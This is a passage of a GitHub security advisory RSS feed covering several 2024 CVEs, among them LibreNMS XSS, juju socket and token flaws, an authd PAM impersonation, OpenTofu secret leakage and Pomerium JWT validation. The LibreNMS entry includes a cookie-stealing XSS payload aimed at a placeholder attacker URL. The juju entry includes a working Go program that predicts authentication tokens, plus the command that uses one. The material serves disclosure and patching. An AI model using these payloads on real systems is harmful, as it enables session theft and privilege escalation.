<p>When the device dependencies page is loaded, this payload triggers the JavaScript, causing the user's browser to redirect to the attacker's website with any non-httponly cookies in the URL.</p>
<p>The root cause of this vulnerability is the application's failure to sanitize the row.hostname value before including it in the HTML output.</p>
<p>This is evident in the following line of code:<br>
<a href="https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74">https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74</a></p>
<h3>PoC</h3>
<ol>
<li>Add a new device using the following payload for the hostname:<br>
<code class="notranslate">t'' autofocus onfocus="document.location='https://&lt;attacker_url&gt;/?c='+document.cookie"</code></li>
<li>Save the device.</li>
<li>Navigate to the device dependencies page.</li>
<li>Observe that the injected script executes, redirecting the user to the attacker's website with any non-httponly cookies included in the URL.</li>
</ol>
<p>Example Request:</p>
<div class="highlight highlight-source-httpspec"><pre class="notranslate"><span class="pl-k">POST</span><span class="pl-c1"> /addhost HTTP/1.1</span>
<span class="pl-s"><span class="pl-v">Host:</span> &lt;your_host&gt;</span>
<span class="pl-s"><span class="pl-v">X-Requested-With:</span> XMLHttpRequest</span>
<span class="pl-s"><span class="pl-v">Content-Type:</span> application/x-www-form-urlencoded; charset=UTF-8</span>
<span class="pl-s"><span class="pl-v">Cookie:</span> &lt;your_cookie&gt;</span>
<span class="pl-ii">_token=&lt;your_token&gt;&amp;hostname=t%27%27+autofocus+onfocus%3D%22document.location%3D%27https%3A%2F%&lt;attacker_url&gt;%2F%3Fc%3D%27%2Bdocument.cookie%22&amp;sysName=&amp;hardware=&amp;os=&amp;os_id=&amp;snmpver=v2c&amp;port=&amp;transport=udp&amp;port_assoc_mode=ifIndex&amp;community=&amp;authlevel=noAuthNoPriv&amp;authname=&amp;authpass=&amp;authalgo=SHA&amp;cryptopass=&amp;cryptoalgo=AES&amp;force_add=on&amp;Submit=</span></pre></div>
<h3>Impact</h3>
<p>It could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-rwwc-2v8q-gc9v" href="https://github.com/librenms/librenms/security/advisories/GHSA-rwwc-2v8q-gc9v">GHSA-rwwc-2v8q-gc9v</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685/hovercard" href="https://github.com/librenms/librenms/commit/36b38a50cc10d4ed16caab92bdc18ed6abac9685">librenms/librenms@<tt>36b38a5</tt></a></li>
<li><a href="https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74">https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/pages/device-dependencies.inc.php#L74</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47527" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47527</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-rwwc-2v8q-gc9v</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-rwwc-2v8q-gc9v</guid>
<pubDate>Tue, 01 Oct 2024 20:31:04 GMT</pubDate>
</item>
<item>
<title>Pagekit Cross-site Scripting vulnerability</title>
<description><p>Pagekit 1.0.18 is vulnerable to Cross Site Scripting (XSS) in index.php/admin/site/widget.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45967" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-45967</a></li>
<li><a href="https://github.com/yingning620/test123/blob/main/Pagekit%20CMS/Pagekit%20CMS%20v1.0.18%20%E5%AD%98%E5%82%A8%E5%9E%8BXSS.md">https://github.com/yingning620/test123/blob/main/Pagekit%20CMS/Pagekit%20CMS%20v1.0.18%20%E5%AD%98%E5%82%A8%E5%9E%8BXSS.md</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-xw32-6422-frqm</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-xw32-6422-frqm</guid>
<pubDate>Tue, 01 Oct 2024 15:32:09 GMT</pubDate>
</item>
<item>
<title>starcitizentools/citizen-skin vulnerable to stored, self-XSS in the "real name" field</title>
<description><h3>Summary</h3>
<p>A user with the <code class="notranslate">editmyprivateinfo</code> right or who can otherwise change their name can XSS themselves by setting their "real name" to an XSS payload.</p>
<h3>Details</h3>
<p>Here's the offending line:<br>
<a href="https://github.com/StarCitizenTools/mediawiki-skins-Citizen/blob/d45c3d69f30863f622f16eb40dd41d3ca943454a/includes/Components/CitizenComponentUserInfo.php#L137">https://github.com/StarCitizenTools/mediawiki-skins-Citizen/blob/d45c3d69f30863f622f16eb40dd41d3ca943454a/includes/Components/CitizenComponentUserInfo.php#L137</a></p>
<p>This was introduced in 717d16af35b10dab04d434aefddbf991fc8c168c</p>
<h3>PoC</h3>
<ol>
<li>Login</li>
<li>Go to Special:Preferences</li>
<li>Set the real name field to a string like <code class="notranslate">&lt;script&gt;alert("Admin with a propensity for self-XSSes")&lt;/script&gt;</code></li>
<li>Save your settings and use Citizen if it's not being used already</li>
</ol>
<p><a target="_blank" rel="noopener noreferrer" href="https://github.com/user-attachments/assets/22adbb70-fcd7-4f81-8e53-1f5f3a730270"><img src="https://github.com/user-attachments/assets/22adbb70-fcd7-4f81-8e53-1f5f3a730270" alt="" style="max-width: 100%;" referrerpolicy="no-referrer"></a></p>
<h3>Impact</h3>
<p>Any user who can change their name (whether it's through the editmyprivateinfo right or through other means) can add XSS payloads that trigger for themselves only.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-62r2-gcxr-426x" href="https://github.com/StarCitizenTools/mediawiki-skins-Citizen/security/advisories/GHSA-62r2-gcxr-426x">GHSA-62r2-gcxr-426x</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/717d16af35b10dab04d434aefddbf991fc8c168c/hovercard" href="https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/717d16af35b10dab04d434aefddbf991fc8c168c">StarCitizenTools/mediawiki-skins-Citizen@<tt>717d16a</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/86da3e07718c8d8da6f4310386fef85599606f9b/hovercard" href="https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/86da3e07718c8d8da6f4310386fef85599606f9b">StarCitizenTools/mediawiki-skins-Citizen@<tt>86da3e0</tt></a></li>
<li><a href="https://github.com/StarCitizenTools/mediawiki-skins-Citizen/blob/d45c3d69f30863f622f16eb40dd41d3ca943454a/includes/Components/CitizenComponentUserInfo.php#L137">https://github.com/StarCitizenTools/mediawiki-skins-Citizen/blob/d45c3d69f30863f622f16eb40dd41d3ca943454a/includes/Components/CitizenComponentUserInfo.php#L137</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47536" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47536</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-62r2-gcxr-426x</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-62r2-gcxr-426x</guid>
<pubDate>Mon, 30 Sep 2024 17:48:33 GMT</pubDate>
</item>
<item>
<title>MantisBT vulnerable to information disclosure with user profiles</title>
<description><p>Using a crafted POST request, an unprivileged, registered user is able to retrieve information about other users' personal system profiles.</p>
<h3>Impact</h3>
<p>Disclosure of private system profiles: Platform, OS, OS version, Description.</p>
<h3>Patches</h3>
<p>Work in progress</p>
<h3>Workarounds</h3>
<p>None</p>
<h3>References</h3>
<p><a href="https://mantisbt.org/bugs/view.php?id=34640" rel="nofollow">https://mantisbt.org/bugs/view.php?id=34640</a></p>
<h3>References< ... |
http://localhost:1200/github/advisor/data/reviewed/go - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - go - reviewed</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github/advisor/data/reviewed/go" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - go - reviewed - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Sat, 05 Oct 2024 18:31:02 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>Vulnerable juju introspection abstract UNIX domain socket</title>
<description><h3>Impact</h3>
<p>An abstract UNIX domain socket responsible for introspection is available without authentication locally to any user with access to the network namespace where the local juju agent is running.</p>
<p>On a juju controller agent, denial of service can be performed by using the <code class="notranslate">/leases/revoke</code> endpoint. Revoking leases in juju can cause availability issues.</p>
<p>On a juju machine agent that is hosting units, disabling the unit component can be performed using the <code class="notranslate">/units</code> endpoint with a "stop" action.</p>
<h3>Patches</h3>
<p>Patch: <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/juju/juju/commit/43f0fc59790d220a457d4d305f484f62be556d3b/hovercard" href="https://github.com/juju/juju/commit/43f0fc59790d220a457d4d305f484f62be556d3b">juju/juju@<tt>43f0fc5</tt></a><br>
Patched in:</p>
<ul>
<li>3.5.4</li>
<li>3.4.6</li>
<li>3.3.7</li>
<li>3.1.10</li>
<li>2.9.51</li>
</ul>
<h3>Workarounds</h3>
<p>No workaround.</p>
<h3>References</h3>
<p><a href="https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/introspection/worker.go#L125">https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/introspection/worker.go#L125</a></p>
<h3>References</h3>
<ul>
<li><a title="GHSA-xwgj-vpm9-q2rq" href="https://github.com/juju/juju/security/advisories/GHSA-xwgj-vpm9-q2rq">GHSA-xwgj-vpm9-q2rq</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8038" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-8038</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/juju/juju/commit/43f0fc59790d220a457d4d305f484f62be556d3b/hovercard" href="https://github.com/juju/juju/commit/43f0fc59790d220a457d4d305f484f62be556d3b">juju/juju@<tt>43f0fc5</tt></a></li>
<li><a href="https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/introspection/worker.go#L125">https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/introspection/worker.go#L125</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-xwgj-vpm9-q2rq</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-xwgj-vpm9-q2rq</guid>
<pubDate>Thu, 03 Oct 2024 16:53:26 GMT</pubDate>
</item>
<item>
<title>Vulnerable juju hook tool abstract UNIX domain socket</title>
<description><h3>Impact</h3>
<p>When combined with an attack of <code class="notranslate">JUJU_CONTEXT_ID</code>, any user on the local system with access to the default network namespace may connect to the <code class="notranslate">@/var/lib/juju/agents/unit-xxxx-yyyy/agent.socket</code> and perform actions that are normally reserved to a juju charm.</p>
<h3>Patches</h3>
<p>Patch: <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/juju/juju/commit/2f2ec128ef5a8ca81fc86ae79cfcdbab0007c206/hovercard" href="https://github.com/juju/juju/commit/2f2ec128ef5a8ca81fc86ae79cfcdbab0007c206">juju/juju@<tt>2f2ec12</tt></a><br>
Patched in:</p>
<ul>
<li>3.5.4</li>
<li>3.4.6</li>
<li>3.3.7</li>
<li>3.1.10</li>
<li>2.9.51</li>
</ul>
<h3>Workarounds</h3>
<p>No workarounds available.</p>
<h3>References</h3>
<p><a href="https://github.com/juju/juju/security/advisories/GHSA-mh98-763h-m9v4">GHSA-mh98-763h-m9v4</a><br>
<a href="https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/uniter/paths.go#L222">https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/uniter/paths.go#L222</a></p>
<h3>References</h3>
<ul>
<li><a title="GHSA-8v4w-f4r9-7h6x" href="https://github.com/juju/juju/security/advisories/GHSA-8v4w-f4r9-7h6x">GHSA-8v4w-f4r9-7h6x</a></li>
<li><a title="GHSA-mh98-763h-m9v4" href="https://github.com/juju/juju/security/advisories/GHSA-mh98-763h-m9v4">GHSA-mh98-763h-m9v4</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8037" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-8037</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/juju/juju/commit/2f2ec128ef5a8ca81fc86ae79cfcdbab0007c206/hovercard" href="https://github.com/juju/juju/commit/2f2ec128ef5a8ca81fc86ae79cfcdbab0007c206">juju/juju@<tt>2f2ec12</tt></a></li>
<li><a href="https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/uniter/paths.go#L222">https://github.com/juju/juju/blob/725800953aaa29dbeda4f806097bf838e61644dd/worker/uniter/paths.go#L222</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8v4w-f4r9-7h6x</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8v4w-f4r9-7h6x</guid>
<pubDate>Thu, 03 Oct 2024 16:53:20 GMT</pubDate>
</item>
<item>
<title>PAM module may allow accessing with the credentials of another user</title>
<description><p>Authd PAM module up to version 0.3.4 can allow broker-managed users to impersonate any other user managed by the same broker and perform any PAM operation with it, including authenticating as them.</p>
<p>This is possible using tools such as <code class="notranslate">su</code>, <code class="notranslate">sudo</code> or <code class="notranslate">ssh</code> (and potentially others) that, so far, do not ensure that the PAM user at the end of the transaction is matching the one who initiated the transaction.</p>
<p>Authd 0.3.5 fixes this by not allowing changing the user unless it was never set before in the PAM stack.</p>
<p><code class="notranslate">su</code> version that will include <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2539116222" data-permission-text="Title is private" data-url="https://github.com/util-linux/util-linux/issues/3206" data-hovercard-type="pull_request" data-hovercard-url="/util-linux/util-linux/pull/3206/hovercard" href="https://github.com/util-linux/util-linux/pull/3206">util-linux/util-linux#3206</a> will not be affected<br>
<code class="notranslate">ssh</code> version that will include <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2556379017" data-permission-text="Title is private" data-url="https://github.com/openssh/openssh-portable/issues/521" data-hovercard-type="pull_request" data-hovercard-url="/openssh/openssh-portable/pull/521/hovercard" href="https://github.com/openssh/openssh-portable/pull/521">openssh/openssh-portable#521</a> will not be affected<br>
<code class="notranslate">sudo</code> version that will include <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2560317781" data-permission-text="Title is private" data-url="https://github.com/sudo-project/sudo/issues/412" data-hovercard-type="pull_request" data-hovercard-url="/sudo-project/sudo/pull/412/hovercard" href="https://github.com/sudo-project/sudo/pull/412">sudo-project/sudo#412</a> will not be affected<br>
<code class="notranslate">login</code> not affected<br>
<code class="notranslate">passwd</code> not affected</p>
<details>
<summary>Old report</summary>
<h3>Summary</h3>
<p>A user can log in as another user using their own credentials</p>
<h3>Details</h3>
<p>I feel we’ve a security issue that is due to the fact that we allow changing the user in the cases in which that’s already provided by PAM. I’ve not tested this using the entra-id broker, but it’s reproducible with the example one, and unless I’m missing something it should be independent from the broker in use.</p>
<p>Basically, by going to the user selection page we allow logging in as any user by entering the user’s own credentials.</p>
<p>See for example: <a href="https://asciinema.org/a/VIcjpDImomaGu0wxsJJxNdmlf" rel="nofollow">https://asciinema.org/a/VIcjpDImomaGu0wxsJJxNdmlf</a> or <a href="https://asciinema.org/a/CV3D1gaEhn2yclqSMKCnifYPo" rel="nofollow">https://asciinema.org/a/CV3D1gaEhn2yclqSMKCnifYPo</a></p>
<p>Basically it’s possible to log in as <code class="notranslate">user1</code> using the credentials of <code class="notranslate">user2</code> or <code class="notranslate">user3</code>.</p>
<p>The issue doesn’t affect login or passwd, but it does affect <code class="notranslate">su</code> and <code class="notranslate">sshd</code>, since in both cases they don’t check if the <code class="notranslate">PAM_USER</code> changed before the final authentication.</p>
<p>Now, while those tools should likely be fixed to only read the PAM_USER once pam gave them the final ok, I think authd should not allow changing the user at all when it has been provided by PAM.</p>
</details>
<h3>References</h3>
<ul>
<li><a title="GHSA-x5q3-c8rm-w787" href="https://github.com/ubuntu/authd/security/advisories/GHSA-x5q3-c8rm-w787">GHSA-x5q3-c8rm-w787</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9313" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-9313</a></li>
<li><a href="https://github.com/ubuntu/authd/commit/63e527496b013bed46904c1c58be593c13ebdce5">https://github.com/ubuntu/authd/commit/63e527496b013bed46904c1c58be593c13ebdce5</a></li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-9313" rel="nofollow">https://www.cve.org/CVERecord?id=CVE-2024-9313</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-x5q3-c8rm-w787</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-x5q3-c8rm-w787</guid>
<pubDate>Thu, 03 Oct 2024 16:53:07 GMT</pubDate>
</item>
<item>
<title>OpenTofu potential leaking of secret variable values when using static evaluation in v1.8</title>
<description><h3>Impact</h3>
<p>Users who have opted into static evaluation of module sources, versions, and backend configurations may be at risk of exposing sensitive variables and locals. This is a workflow that should not be possible and should explicitly show errors.</p>
<h3>Workarounds</h3>
<p>Check that you are not using sensitive variables in module sources and versions, as well as backend configurations. The patch will add explicit errors and prevent this from being possible.</p>
<h3>Examples</h3>
<div class="highlight highlight-source-hcl"><pre class="notranslate"><span class="pl-en">variable</span> <span class="pl-smi">"backend_path"</span> {
<span class="pl-v"><span class="pl-smi">type</span> <span class="pl-k">=</span> </span><span class="pl-k">string</span>
<span class="pl-v"><span class="pl-smi">sensitive</span> <span class="pl-k">=</span> </span><span class="pl-c1">true</span>
}
<span class="pl-en">terraform</span> {
<span class="pl-en">backend</span> <span class="pl-smi">"local"</span> {
<span class="pl-v"><span class="pl-smi">path</span> <span class="pl-k">=</span> </span>var<span class="pl-k">.</span><span class="pl-smi">backend_path</span>
}
}</pre></div>
<div class="highlight highlight-source-hcl"><pre class="notranslate"><span class="pl-en">variable</span> <span class="pl-smi">"mod_info"</span> {
<span class="pl-v"><span class="pl-smi">type</span> <span class="pl-k">=</span> </span><span class="pl-k">string</span>
<span class="pl-v"><span class="pl-smi">sensitive</span> <span class="pl-k">=</span> </span><span class="pl-c1">true</span>
}
<span class="pl-en">module</span> <span class="pl-smi">"foo"</span> {
<span class="pl-v"><span class="pl-smi">source</span> <span class="pl-k">=</span> </span>var<span class="pl-k">.</span><span class="pl-smi">mod_info</span>
<span class="pl-c"><span class="pl-c">//</span>version = var.mod_info<span class="pl-c"></span></span>
}</pre></div>
<h3>References</h3>
<ul>
<li><a title="GHSA-wpr2-j6gr-pjw9" href="https://github.com/opentofu/opentofu/security/advisories/GHSA-wpr2-j6gr-pjw9">GHSA-wpr2-j6gr-pjw9</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wpr2-j6gr-pjw9</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wpr2-j6gr-pjw9</guid>
<pubDate>Thu, 03 Oct 2024 16:51:50 GMT</pubDate>
</item>
<item>
<title>JUJU_CONTEXT_ID is a predictable authentication secret</title>
<description><p><code class="notranslate">JUJU_CONTEXT_ID</code> is the authentication measure on the unit hook tool abstract domain socket. It looks like <code class="notranslate">JUJU_CONTEXT_ID=appname/0-update-status-6073989428498739633</code>.</p>
<p>This value looks fairly unpredictable, but due to the random source used, it is highly predictable.</p>
<p><code class="notranslate">JUJU_CONTEXT_ID</code> has the following components:</p>
<ul>
<li>the application name</li>
<li>the unit number</li>
<li>the hook being currently run</li>
<li>a uint63 decimal number</li>
</ul>
<p>On a system the application name and unit number can be deduced by reading the structure of the filesystem.<br>
The current hook being run is not easily deducible, but it comes from a limited set of possible values, so one could try them all.<br>
Finally, the random number is generated from a non-cryptographically-secure random source: specifically, the random number generator built into the Go standard library, seeded with the current Unix time in seconds (at startup).</p>
<p>There is no rate limiting on the abstract domain socket, the only limiting factor is time (window of time the hook is run) and memory (how much memory is available to facilitate all the connections).</p>
<h3>Impact</h3>
<p>On a juju machine (non-kubernetes) or juju charm container (on kubernetes), an unprivileged user in the same network namespace can connect to an abstract domain socket and guess the JUJU_CONTEXT_ID value. This gives the unprivileged user access to the same information and tools as the juju charm. This information could be secrets that give broader access.</p>
<h3>Patches</h3>
<p>Patch: <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/juju/juju/commit/ecd7e2d0e9867576b9da04871e22232f06fa0cc7/hovercard" href="https://github.com/juju/juju/commit/ecd7e2d0e9867576b9da04871e22232f06fa0cc7">juju/juju@<tt>ecd7e2d</tt></a><br>
Patched in:</p>
<ul>
<li>3.5.4</li>
<li>3.4.6</li>
<li>3.3.7</li>
<li>3.1.10</li>
<li>2.9.51</li>
</ul>
<h3>Workarounds</h3>
<p>No workaround. Upgrade will be required.</p>
<h3>References</h3>
<p><a href="https://github.com/juju/juju/blob/a5b7876263365977bd3e583f5325facdae73fbe4/worker/uniter/runner/context/contextfactory.go#L152">https://github.com/juju/juju/blob/a5b7876263365977bd3e583f5325facdae73fbe4/worker/uniter/runner/context/contextfactory.go#L152</a><br>
<a href="https://github.com/juju/juju/blob/a5b7876263365977bd3e583f5325facdae73fbe4/worker/uniter/runner/context/contextfactory.go#L164">https://github.com/juju/juju/blob/a5b7876263365977bd3e583f5325facdae73fbe4/worker/uniter/runner/context/contextfactory.go#L164</a></p>
<h3>PoC</h3>
<p>With a contrived example, a charm that sleeps indefinitely on its first hook, install. This charm is called sleepy.</p>
<pre class="notranslate"><code class="notranslate">.
|-- hooks
|   `-- install
|           #!/bin/sh
|           sleep 10000
|-- manifest.yaml
|       bases:
|       - name: ubuntu
|         channel: 22.04/stable
|         architectures:
|         - amd64
|-- metadata.yaml
|       name: sleepy
|       summary: a sleepy charm
|       description: a sleepy charm that sleeps on install
`-- revision
        1
</code></pre>
<p>With sleepy deployed into a model, we have a unit with the name <code class="notranslate">sleepy/0</code> and a tag of <code class="notranslate">unit-sleepy-0</code>.</p>
<p>With access to the log file we can very quickly get the start time of the unit:</p>
<pre class="notranslate"><code class="notranslate">ubuntu@juju-5e40c0-0:~$ cat /var/log/juju/unit-sleepy-0.log | grep 'unit "sleepy/0" started'
2024-08-06 05:10:07 INFO juju.worker.uniter uniter.go:363 unit "sleepy/0" started
</code></pre>
<p>If we don't have access to the log, we could get pretty close by trying every second between when log file was created and now:</p>
<pre class="notranslate"><code class="notranslate">nobody@juju-5e40c0-0:/var/log/juju$ cat unit-sleepy-0.log
cat: unit-sleepy-0.log: Permission denied
nobody@juju-5e40c0-0:/var/log/juju$ stat unit-sleepy-0.log
  File: unit-sleepy-0.log
  Size: 1403            Blocks: 8          IO Block: 4096   regular file
Device: 10302h/66306d   Inode: 25967076    Links: 1
Access: (0640/-rw-r-----)  Uid: (  104/  syslog)   Gid: (    4/     adm)
Access: 2024-08-06 05:10:48.686975042 +0000
Modify: 2024-08-06 05:10:07.159133215 +0000
Change: 2024-08-06 05:10:07.159133215 +0000
 Birth: 2024-08-06 05:10:06.965129276 +0000
</code></pre>
<p>We can then pass that into this program:</p>
<pre class="notranslate"><code class="notranslate">package main

import (
	"flag"
	"fmt"
	"math/rand"
	"time"
)

func main() {
	var unitName string
	var unitStartLogTime string
	var currentHook string
	flag.StringVar(&amp;unitName, "u", "sleepy/0", "")
	flag.StringVar(&amp;unitStartLogTime, "t", "2024-08-06 05:10:07", "time when the last 'INFO juju.worker.uniter uniter.go:363 unit %q started' log was written to /var/log/juju/unit-name-0.log")
	flag.StringVar(&amp;currentHook, "h", "install", "the current hook that is running right now")
	flag.Parse()

	t, err := time.Parse("2006-01-02 15:04:05", unitStartLogTime)
	if err != nil {
		panic(err)
	}

	// The uniter seeds math/rand with its start time in whole seconds, so a
	// few candidate seeds around the logged start time cover the real one.
	sources := []rand.Source{
		rand.NewSource(t.Unix()),
		rand.NewSource(t.Unix() - 1),
		rand.NewSource(t.Unix() - 2),
	}

	// Each hook run draws one Int63 from the stream; print the first ten
	// values from every candidate seed as JUJU_CONTEXT_ID guesses.
	for i := 0; i &lt; 10; i++ {
		for _, source := range sources {
			fmt.Printf("%s-%s-%d\n", unitName, currentHook, source.Int63())
		}
	}
}
</code></pre>
<p>This program will give us a list of <code class="notranslate">JUJU_CONTEXT_ID</code>s to try. We just need to try each one. In this case it was the first one, because we had enough information.</p>
<pre class="notranslate"><code class="notranslate">$ go run . -u sleepy/0 -t "2024-08-06 05:10:07" -h install
sleepy/0-install-7349430268617352851
sleepy/0-install-2171542415131519293
sleepy/0-install-6564961386023494624
sleepy/0-install-59904244413115609
sleepy/0-install-6073989428498739633
sleepy/0-install-2504995199508561544
sleepy/0-install-1526670560532335303
sleepy/0-install-2568216045630615950
sleepy/0-install-8047402353801897930
</code></pre>
<p>Unfortunately, this worked too well.</p>
<pre class="notranslate"><code class="notranslate">nobody@juju-5e40c0-0:/var/log/juju$ JUJU_AGENT_SOCKET_NETWORK=unix JUJU_AGENT_SOCKET_ADDRESS=@/var/lib/juju/agents/unit-sleepy-0/agent.socket JUJU_CONTEXT_ID=sleepy/0-install-7349430268617352851 /var/lib/juju/tools/unit-sleepy-0/is-leader
True
</code></pre>
<p>With a more sophisticated attack, this could discover all the units on the machine, use the update-status hook, try a few thousand attempts per second to guess the start time and the current offset in the random source, and then use the secret-get hook tool to obtain some sort of secret, such as credentials to a system.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-mh98-763h-m9v4" href="https://github.com/juju/juju/security/advisories/GHSA-mh98-763h-m9v4">GHSA-mh98-763h-m9v4</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-7558" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-7558</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/juju/juju/commit/ecd7e2d0e9867576b9da04871e22232f06fa0cc7/hovercard" href="https://github.com/juju/juju/commit/ecd7e2d0e9867576b9da04871e22232f06fa0cc7">juju/juju@<tt>ecd7e2d</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mh98-763h-m9v4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mh98-763h-m9v4</guid>
<pubDate>Thu, 03 Oct 2024 16:49:58 GMT</pubDate>
</item>
<item>
<title>Pomerium service account access token may grant unintended access to databroker API</title>
<description><h3>Impact</h3>
<p>We've identified a vulnerability in the Pomerium databroker service API that may grant unintended access under specific conditions. This affects only certain Pomerium Zero and Pomerium Enterprise deployments.</p>
<h4>Who is affected?</h4>
<p>A Pomerium deployment is susceptible to this issue if <em>all</em> of the following conditions are met:</p>
<ul>
<li>You have issued a <a href="https://www.pomerium.com/docs/capabilities/service-accounts" rel="nofollow">service account</a> access token using Pomerium Zero or Pomerium Enterprise.</li>
<li>The access token has an explicit expiration date in the future.</li>
<li>The core Pomerium databroker gRPC API is not otherwise secured by network access controls.</li>
</ul>
<p>If your deployment does not meet <em>all</em> of these conditions, you are not affected by this vulnerability.</p>
<h4>Details</h4>
<p>The Pomerium databroker service is responsible for managing all persistent Pomerium application state. Requests to the databroker service API are authorized by the presence of a JSON Web Token (JWT) signed by a key known by all Pomerium services in the same deployment. However, incomplete validation of this JWT meant that some service account access tokens would incorrectly be treated as valid for the purpose of databroker API authorization.</p>
<p>Improper access to the databroker API could allow exfiltration of user info, spoofing of user sessions, or tampering with Pomerium routes, policies, and other settings.</p>
<h4>Discovery</h4>
<p>This issue was discovered during internal review. At this time we have no evidence to suggest that this vulnerability has been exploited in the wild.</p>
<h3>Patches</h3>
<p>We have released <a href="https://github.com/pomerium/pomerium/releases/tag/v0.27.1">Pomerium v0.27.1</a> which includes a fix for the JWT validation logic. All affected users are strongly encouraged to upgrade to this version.</p>
<h3>Workarounds</h3>
<p>If you cannot upgrade immediately, consider the following mitigations:</p>
<ul>
<li>
<p>Network access controls: Restrict access to the Pomerium internal gRPC API by configuring your network firewall or security groups to limit access to trusted sources only. Ensure that the port specified in the <a href="https://www.pomerium.com/docs/reference/grpc#grpc-address" rel="nofollow"><code class="notranslate">grpc_address</code></a> setting is not exposed to unauthorized networks.</p>
</li>
<li>
<p><em>For Pomerium Zero deployments only:</em> As of Pomerium v0.26.0, you can disable the gRPC API listener by setting <code class="notranslate">grpc_address: ""</code> in your YAML configuration file. In all-in-one mode, Pomerium does not require the internal gRPC API to be exposed beyond localhost.</p>
</li>
</ul>
<h3>For more information</h3>
<p>If you have questions or need further assistance:</p>
<ul>
<li>Open an issue in the <a href="https://github.com/pomerium/pomerium/issues">pomerium/pomerium</a> repository.</li>
<li>Contact us at <a href="mailto:security@pomerium.com">security@pomerium.com</a>.</li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-r7rh-jww5-5fjr" href="https://github.com/pomerium/pomerium/security/advisories/GHSA-r7rh-jww5-5fjr">GHSA-r7rh-jww5-5fjr</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/pomerium/pomerium/commit/e018cf0fc0979d2abe25ff705db019feb7523444/hovercard" href="https://github.com/pomerium/pomerium/commit/e018cf0fc0979d2abe25ff705db019feb7523444">pomerium/pomerium@<tt>e018cf0</tt></a></li>
